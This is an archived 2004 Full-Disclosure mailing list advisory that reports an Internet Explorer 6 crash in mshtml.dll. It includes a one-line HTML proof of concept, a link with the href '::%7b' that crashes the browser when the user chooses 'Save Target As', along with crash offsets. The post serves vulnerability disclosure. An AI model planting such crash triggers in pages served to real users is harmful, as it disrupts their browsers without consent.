[Full-Disclosure] Internet Explorer Remote Null Pointer Crash(mshtml.dll)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 06/14/04

  • Next message: Clairmont, Jan M: "FW: [Full-Disclosure] Security Index SECURE SOCKETS LAYER COELACANTH: Phreak Phishing Expedition"
    To: "vulnwatch" <vulnwatch@vulnwatch.org>
    Date: Mon, 14 Jun 2004 23:20:33 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Internet Explorer
    Vendors: http://www.microsoft.com
    Versions: 6.0.2800.1106.xpclnt_qfe.021108-2107
    Patched With: SP1;Q832894;Q330994;Q837009;Q831167;
    ModName: mshtml.dll
    ModVer: 6.0.2734.1600
    Platforms: Windows
    Bug: Remote/Local Null Pointer Crash
    Exploitation: Remote with browser
    Date: 14 Jun 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Internet Explorer is currently the most common internet browser in the
    world.
    It comes by default with every windows operating system. Therefore any
    vulnerability
    concerning it is an highly important issue.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Upon clicking "Save As" on a link with double colon --> "::"
    and
    a left curly bracket --> "{"
    then
    Internet Explorer Will Crash.

    AppName: iexplore.exe AppVer: 6.0.2600.0 ModName: ntdll.dll
    ModVer: 5.1.2600.114 Offset: 00056074

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Paste into an htm/html file:
    <center><a href=::%7b>Right Click aOn Me And Click "Save Target As"</a>

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Scripts and Codes will make me D.O.S , but they will never HACK me."

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Clairmont, Jan M: "FW: [Full-Disclosure] Security Index SECURE SOCKETS LAYER COELACANTH: Phreak Phishing Expedition"

    Relevant Pages

    • Is Microsoft Ready to Lose the Browser Wars?
      ... Is Microsoft Ready to Lose the Browser Wars? ... Rather than just bundle Internet Explorer, ... those days, there was even a Mac version, one that Apple accepted, along ...
      (comp.sys.mac.advocacy)
    • Re: OE as Default
      ... Do I still need to reset my Web settings? ... How to Make Internet Explorer the Default Web Browser ... Internet Explorer should check to see whether it is the default browser - ...
      (microsoft.public.windows.inetexplorer.ie6.browser)
    • Re: OE as Default
      ... Do I still need to reset my Web settings? ... How to Make Internet Explorer the Default Web Browser ... Internet Explorer should check to see whether it is the default browser - ...
      (microsoft.public.windows.inetexplorer.ie6.browser)
    • La.i 1 anh Ru`a IE9 mo*i dza no` :)))
      ... Internet Explorer 9: An Early Look ... Explorer 9 browser engine out for a spin. ... Speed and standards. ... performance and standards support. ...
      (soc.culture.vietnamese)
    • Re: OE as Default
      ... How to Make Internet Explorer the Default Web Browser ... Internet Explorer should check to see whether it is the default browser - ... some of your Internet Explorer settings ... You can reset your Internet Explorer settings to ...
      (microsoft.public.windows.inetexplorer.ie6.browser)